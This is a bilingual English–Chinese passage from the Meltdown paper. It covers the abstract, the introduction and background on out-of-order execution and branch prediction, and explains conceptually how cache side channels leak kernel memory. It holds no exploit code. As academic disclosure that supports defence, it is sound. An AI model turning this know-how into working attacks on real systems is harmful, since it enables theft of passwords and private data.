Meltdown
熔断
Moritz Lipp1, Michael Schwarz1, Daniel Gruss1, Thomas Prescher2, Werner Haas2,
Stefan Mangard1, Paul Kocher3, Daniel Genkin4, Yuval Yarom5, Mike Hamburg6
1 Graz University of Technology
2 Cyberus Technology GmbH
3 Independent
4 University of Pennsylvania and University of Maryland
5 University of Adelaide and Data61
6 Rambus, Cryptography Research Division
Abstract
摘要
The security of computer systems fundamentally relies on memory isolation, e.g., kernel address ranges are marked as non-accessible and are protected from user access. In this paper, we present Meltdown. Meltdown exploits side effects of out-of-order execution on modern processors to read arbitrary kernel-memory locations including personal data and passwords. Out-of-order execution is an indispensable performance feature and present in a wide range of modern processors. The attack is independent of the operating system, and it does not rely on any software vulnerabilities. Meltdown breaks all security assumptions given by address space isolation as well as paravirtualized environments and, thus, every security mechanism building upon this foundation. On affected systems, Meltdown enables an adversary to read memory of other processes or virtual machines in the cloud without any permissions or privileges, affecting millions of customers and virtually every user of a personal computer. We show that the KAISER defense mechanism for KASLR [8] has the important (but inadvertent) side effect of impeding Meltdown. We stress that KAISER must be deployed immediately to prevent large-scale exploitation of this severe information leakage.
计算机系统的安全性根本上依赖于内存隔离,例如,被保护的内核地址范围将被标记为用户不可访问的。在本篇论文中,我们将介绍“熔断”漏洞。熔断利用乱序执行对现代处理器带来的副作用,从而可以读取任意内核内存地址,包括隐私数据和密码。乱序执行是不可或缺的性能特征,并且广泛运用于绝大多数现代处理器当中。这类攻击独立于操作系统,并且不依赖于任何软件漏洞。熔断破坏了所有由地址空间隔离、半虚拟化环境提供的安全假设,和所有以此为基础所构建的安全措施。在受影响的系统上,熔断能够在没有任何允许和权限的云上读取其他进程或虚拟机的内存,触及数百万用户和几乎每个人的个人电脑。我们发现对KASLR的KAISER防御机制[8],在防御熔断上有非常重要(但不经意)的的额外效果。我们强烈建议,必须立刻部署KAISER以防止这样严重的信息泄露BUG的被大规模利用。
1 Introduction
1 绪论
One of the central security features of today’s operating systems is memory isolation. Operating systems ensure that user applications cannot access each others memories and prevent user applications from reading or writing kernel memory. This isolation is a cornerstone of our computing environments and allows running multiple applications on personal devices or executing processes of multiple users on a single machine in the cloud.
对于今天的操作系统而言,最重要的安全特征之一就是内存隔离。操作系统保证用户程序彼此之间无法访问对方的内存,并且阻止用户系统对内核内存进行读写操作。这样的隔离机制是个人机器上允许并行多个应用程序、在云上的单机器能够支持多用户同时执行进程,以及整个计算环境的基石。
On modern processors, the isolation between the kernel and user processes is typically realized by a supervisor bit of the processor that defines whether a memory page of the kernel can be accessed or not. The basic idea is that this bit can only be set when entering kernel code and it is cleared when switching to user processes. This hardware feature allows operating systems to map the kernel into the address space of every process and to have very efficient transitions from the user process to the kernel, e.g., for interrupt handling. Consequently, in practice, there is no change of the memory mapping when switching from a user process to the kernel.
在现代处理器上,内核和用户进程之间的隔离通常由处理器的一个标记位实现,该标记位定义了内核的内存页面是否可以访问。其基本思想是只有当进入内核代码时才能设置该位,而切换到用户进程时该位被清除。这样的硬件特性允许操作系统将内核映射到每个进程的地址空间,并且从用户进程到内核的转换非常高效,例如中断处理。因此,在实际操作中,从用户进程切换到内核时不会改变内存映射。
In this work, we present Meltdown. Meltdown is a novel attack that allows overcoming memory isolation completely by providing a simple way for any user process to read the entire kernel memory of the machine it executes on, including all physical memory mapped in the kernel region. Meltdown does not exploit any software vulnerability, i.e., it works on all major operating systems. Instead, Meltdown exploits side-channel information available on most modern processors, e.g., modern Intel micro-architectures since 2010 and potentially on other CPU’s of other vendors.
在这项工作中,我们将介绍熔断。熔断是一种是一种新颖的攻击方式,它允许任何用户进程读取执行机器上的整个内核内存,包括映射到内核区域的所有物理内存,从而完全攻克内存隔离。熔断不利用任何软件漏洞,所以它几乎能够在所有主流的操作系统上起作用。相反,它利用了大多数现代处理器(例如,自2010年以来的现代英特尔微体系结构,可能还有其他供应商提供的CPU)上的旁路通道信息。
While side-channel attacks typically require very specific knowledge about the target application and are tailored to only leak information about its secrets, Meltdown allows an adversary who can run code on the vulnerable processor to obtain a dump of the entire kernel address space, including any mapped physical memory. The root cause of the simplicity and strength of Meltdown are side effects caused by out-of-order execution.
虽然旁路通道攻击需要目标应用程序非常具体的相关信息,并且还要针对泄露的隐私数据进行特化处理,但熔断能让那些能够在有漏洞的处理器上执行代码的黑客,获取整个内核地址空间的转储,包括任何映射的物理内存。熔断简易且强悍的根本原因正是乱序执行所带来的副作用。
Out-of-order execution is an important performance feature of today’s processors in order to overcome latencies of busy execution units, e.g., a memory fetch unit needs to wait for data arrival from memory. Instead of stalling the execution, modern processors run operations out-of-order i.e., they look ahead and schedule subsequent operations to idle execution units of the processor. However, such operations often have unwanted side-effects, e.g., timing differences [28, 35, 11] can leak information from both sequential and out-of-order execution.
乱序执行是现代处理器一个重要的性能特性,用以克服过于繁忙的执行单元在等待上的延迟,比如一个内存读取单元需要等待内存数据的到达。现代处理器将不会拖延整个程序的执行,而是不按顺序执行操作,即向前看,并将后续操作安排到处理器的空闲执行单元。可是,有些操作通常会带来非预期的副作用,例如时序差异[28][35][11],会从顺序执行和乱序执行之中泄露信息。
From a security perspective, one From a security perspective, one observation is particularly significant: Out-of-order; vulnerable CPUs allow an unprivileged process to load data from a privileged (kernel or physical) address into a temporary CPU register. Moreover, the CPU even performs further computations based on this register value, e.g., access to an array based on the register value. The processor ensures correct program execution, by simply discarding the results of the memory look-ups (e.g., the modified register states), if it turns out that an instruction should not have been executed. Hence, on the architectural level (e.g., the abstract definition of how the processor should perform computations), no security problem arises.
从安全角度来看,一个观察是特别重要的:乱序;有漏洞的CPU允许非特权进程将数据从特权(内核或物理)地址加载到临时CPU寄存器中。此外,CPU甚至能根据该寄存器值进行更多的计算,例如,基于寄存器值访问数组。处理器通过简单地丢弃存储器查找的结果(例如,修改的寄存器状态)来确保正确的程序执行,如果查询结果是某条指令不应该执行的话。 因此,在架构级别(例如,处理器如何执行计算的抽象定义),不会出现安全问题。
However, we observed that out-of-order memory look-ups influence the cache, which in turn can be detected through the cache side channel. As a result, an attacker can dump the entire kernel memory by reading privileged memory in an out-of-order execution stream, and transmit the data from this elusive state via a micro-architectural covert channel (e.g., Flush+Reload) to the outside world. On the receiving end of the covert channel, the register value is reconstructed. Hence, on the micro-architectural level (e.g., the actual hardware implementation), there is an exploitable security problem.
但是,我们观察到乱序的内存查找会影响缓存,而缓存又可以从缓存侧通道被窥视。最终,通过读取乱序执行流中的特权存储器,攻击者可以转储出整个内核内存,并且通过微体系结构隐蔽信道(例如Flush + Reload),将这些原本处于难以捉摸状态下的数据传输到外界。在隐蔽通道的接收端,寄存器值被重构。 因此,在微体系结构层面(例如,实际的硬件实现层面),存在可利用的安全问题。
Meltdown breaks all security assumptions given by the CPU’s memory isolation capabilities. We evaluated the attack on modern desktop machines and laptops, as well as servers in the cloud. Meltdown allows an unprivileged process to read data mapped in the kernel address space, including the entire physical memory on Linux and OS X, and a large fraction of the physical memory on Windows. This may include physical memory of other processes, the kernel, and in case of kernel-sharing sandbox solutions (e.g., Docker, LXC) or Xen in paravirtualization mode, memory of the kernel (or hypervisor), and other co-located instances. While the performance heavily depends on the specific machine, e.g., processor speed, TLB and cache sizes, and DRAM speed, we can dump kernel and physical memory with up to 503KB/s. Hence, an enormous number of systems are affected.
熔断破坏了所有由CPU内存隔离能力提供的安全假设。我们评估了此攻击对台式机、笔记本以及云服务器的影响。熔断允许非特权进程读取映射在内核地址空间内的数据,包括Linux和OS X上的整个物理内存以及Windows上的大部分物理内存。这可能包括其他进程的物理内存,内核,内核共享沙盒解决方案(例如,Docker,LXC)和半虚拟化Xen,内核(或虚拟机监视器)的存储器以及其他共享地址的实例。尽管转储的性能在很大程度上取决于特定的机器,例如处理器速度,TLB和缓存大小,以及DRAM速度,我们仍然可以以高达503KB/s的速度转储内核和物理内存。因此,大批量的系统将受到影响。KAISER[8]对策最初是为了防止针对KASLR的旁路攻击而展开的,但它也无意中抵御了熔断。 我们的评估表明,KAISER在很大程度上抵御了熔断。 因此,我们强调,立即在所有操作系统上部署KAISER是非常重要的举措。幸运的是,在负责任的揭开漏洞的同时,三大操作系统(Windows,Linux和OS X)也实现了KAISER的变体,并将在不久的将来推出这些补丁。
Meltdown is distinct from the Spectre Attacks [19] in several ways, notably that Spectre requires tailoring to the victim process’s software environment, but applies more broadly to CPUs and is not mitigated by KAISER.
熔毁在几个方面与“幽灵”攻击 [19]截然不同,值得注意的是,幽灵需要根据受害者进程的软件环境进行特化,但是更广泛地作用于CPU,而KAISER无法对其进行缓解。
Contributions. The contributions of this work are:
贡献。这篇论文的贡献在于:
1. We describe out-of-order execution as a new, extremely powerful, software-based side channel.
1. 我们将乱序执行定义为一种新的,非常强大的,基于软件的旁路通道;
2. We show how out-of-order execution can be combined with a micro-architectural
overt channel to transfer the data from an elusive state to a receiver on the outside.
2. 我们展示了如何将乱序执行与微架构隐秘通道结合起来将数据从混乱的状态转移到外部的接收器上;
3. We present an end-to-end attack combining out-of-order execution with exception handlers or TSX, to read arbitrary physical memory without any permissions or privileges, on laptops, desktop machines, and on public cloud machines.
3. 在笔记本电脑,台式计算机以及云服务器上,我们提出了一种端到端的攻击,将乱序执行与异常处理或TSX组合在一起,无需任何权限或特权即可读取任意物理内存;
4. We evaluate the performance of Meltdown and the effects of KAISER on it.
4. 我们评估了熔断的性能以及KAISER对它的影响。
Outline. The remainder of this paper is structured as follows:
大纲。 本文的其余部分结构如下:
In Section 2, we describe the fundamental problem which is introduced with out-of-order execution. In Section 3, we provide a toy example illustrating the side channel Meltdown exploits. In Section 4, we describe the building blocks of the full Meltdown attack. In Section 5, we present the Meltdown attack. In Section 6, we evaluate the performance of the Meltdown attack on several different systems. In Section 7, we discuss the effects of the software-based KAISER countermeasure and propose solutions in hardware. In Section 8, we discuss related work and conclude our work in Section 9.
在第2节中,我们描述了乱序执行引入的基本问题。在第3节中,我们提供了一个简单示例,说明了旁路熔断漏洞。 在第4节中,我们描述了熔断攻击的完整组成结构。 在第5节中,我们将介绍熔断攻击。在第6节中,我们评估了几种不同系统上熔断攻击的性能。在第7节中,我们讨论基于软件的KAISER策略的效果,并提出硬件解决方案。在第8节中,我们讨论相关的论文,并在第9节结束本篇论文。
2 Background
2 背景
In this section, we provide background on out-of-order execution, address translation, and cache attacks.
在本节中,我们将讨论有关乱序执行、地址转换和缓存攻击的背景。
2.1 Out-of-order execution
2.1 乱序执行
Out-of-order execution is an optimization technique that allows to maximize the utilization of all execution units of a CPU core as exhaustive as possible. Instead of processing instructions strictly in the sequential program order, the CPU executes them as soon as all required resources are available. While the execution unit of the current operation is occupied, other execution units can run ahead. Hence, instructions can be run in parallel as long as their results follow the architectural definition.
乱序执行是一种优化技术,它尽最可能最大限度的利用CPU内核的所有执行单元。对比于程序严格的按照顺序执行指令,CPU需要所有必需的资源准备完毕才可执行。当前操作的执行单元被占用时,其他的执行单元可以继续向前。因此,只要指令执行的结果符合架构定义,那么它们就能够运行。
In practice, CPUs supporting out-of-order execution support running operations speculatively to the extent that the processor’s out-of-order logic processes instructions before the CPU is certain whether the instruction will be needed and committed. In this paper, we refer to speculative execution in a more restricted meaning, where it refers to an instruction sequence following a branch, and use the term out-of-order execution to refer to any way of getting an operation executed before the processor has committed the results of all prior instructions.
在实际情况中,支持乱序执行的CPU允许进行推测性的执行操作,某种程度下,在CPU明确知道是否需要和提交指令之前,处理器的乱序逻辑就会处理该指令。在此篇论文中,我们将推测执行解释成更加具有限制性的含义,它专指某一分支之后的指令序列,并且使用乱序执行这一术语去指代任何在处理器提交前一指令的执行结果之前执行的操作。
In 1967, Tomasulo [33] developed an algorithm [33] that enabled dynamic scheduling of instructions to allow out-of-order execution. Tomasulo [33] introduced a unified reservation station that allows a CPU to use a data value as it has been computed instead of storing it to a register and re-reading it. The reservation station renames registers to allow instructions that operate on the same physical registers to use the last logical one to solve read-after-write (RAW), write-after-read (WAR) and write-after-write (WAW) hazards. Furthermore, the reservation unit connects all execution units via a common data bus (CDB). If an operand is not available, the reservation unit can listen on the CDB until it is available and then directly begin the execution of the instruction.
1967年,Tomasulo[33]发明了一种能够动态调度指令以允许乱序执行的算法[33]。他引入了一个统一的保留段,允许CPU使用已经计算过的数值,而不是将其存储到寄存器中并重新读取。这一保留段重命名了寄存器,以允许在相同的物理寄存器执行的指令使用最后一个逻辑寄存器来解决读后写(RAW)、写后读(WAR)、写后写(WAW)的风险。此外,保留段通过公共数据总线(CDB)链接所有的执行单元。如果一个指令不可用,则保留段可以在CDB上监听直到其可用,然后直接开始执行。
On the Intel architecture, the pipeline consists of the front-end, the execution engine (back-end) and the memory subsystem [14]. x86 instructions are fetched by the front-end from the memory and decoded to micro-operations (μOPs) which are continuously sent to the execution engine. Out-of-order execution is implemented within the execution engine as illustrated in Figure 1. The Reorder Buffer is responsible for register allocation, register renaming and retiring. Additionally, other optimizations like move elimination or the recognition of zeroing idioms are directly handled by the reorder buffer. The μOPs are forwarded to the Unified Reservation Station that queues the operations on exit ports that are connected to Execution Units. Each execution unit can perform different tasks like ALU operations, AES operations, address generation units (AGU) or memory loads and stores. AGUs as well as load and store execution units are directly connected to the memory subsystem to process its requests.
在Intel的结构中,流水线由前端,执行引擎(后端)和内存子系统[14]组成。 x86指令由前端从存储器中提取并解码为连续发送给执行引擎的微操作(μOPs)。乱序执行将落地到执行引擎中,如图1所示。重排序缓冲器负责寄存器分配,寄存器重命名和注销。另外,其他优化措施如移动消除或归零成语的识别直接由重排序缓冲器处理。 μOPs被转发到统一保留段,将连接到执行单元的出端口上的操作排入队列。每个执行单元可以执行不同的任务,如ALU操作,AES操作,地址生成单元(AGU)或内存加载和存储。 AGUs以及加载和存储执行单元将直连到内存子系统去处理其请求。
Figure 1: Simplified illustration of a single core of the Intel’s Skylake microarchitecture. Instructions are decoded into μOPs and executed out-of-order in the execution engine by individual execution units.
图1:英特尔Skylake微体系结构的单核简图。 指令被解码为微操作并由执行引擎通过单独的执行单元乱序执行。
Since CPUs usually do not run linear instruction streams, they have branch prediction units that are used to obtain an educated guess of which instruction will be executed next. Branch predictors try to determine which direction of a branch will be taken before its condition is actually evaluated. Instructions that lie on that path and do not have any dependencies can be executed in advance and their results immediately used if the prediction was correct. If the prediction was incorrect, the reorder buffer allows to rollback by clearing the reorder buffer and re-initializing the unified reservation station.
由于CPU通常不运行线性指令流,因此它们具有分支预测单元,用于获得接下来将执行哪条指令的有根据的猜测。分支预测器会尝试在实际评估条件之前确定分支的哪个方向将被采用。如果预测正确,则可以预先执行位于该路径上且没有任何依赖关系的指令,并立即使用它们的结果。如果预测不正确,重排序缓冲区允许通过清除重排序缓冲并重新初始化统一预留段来回滚。
Various approaches to predict the branch exist: With static branch prediction [12], the outcome of the branch is solely based on the instruction itself. Dynamic branch prediction [2] gathers statistics at run-time to predict the outcome. One-level branch prediction uses a 1-bit or 2-bit counter to record the last outcome of the branch [21]. Modern processors often use two-level adaptive predictors [36] that remember the history of the last n outcomes allow to predict regularly recurring patterns. More recently, ideas to use neural branch prediction [34, 18, 32] have been picked up and integrated into CPU architectures [3].
预测分支的各种方法:静态分支预测[12],分支预测的结果完全基于指令本身;动态分支预测[2],在运行时收集统计数据来预测结果;一级分支预测,使用1位或2位计数器记录分支的最后结果[21];现代处理器通常使用两级自适应预测[36],通过记忆最后n个历史结果来预测规律性循环模式。最近,神经网络分支预测[34][18][32]理念已网罗并集成到CPU架构中[3]。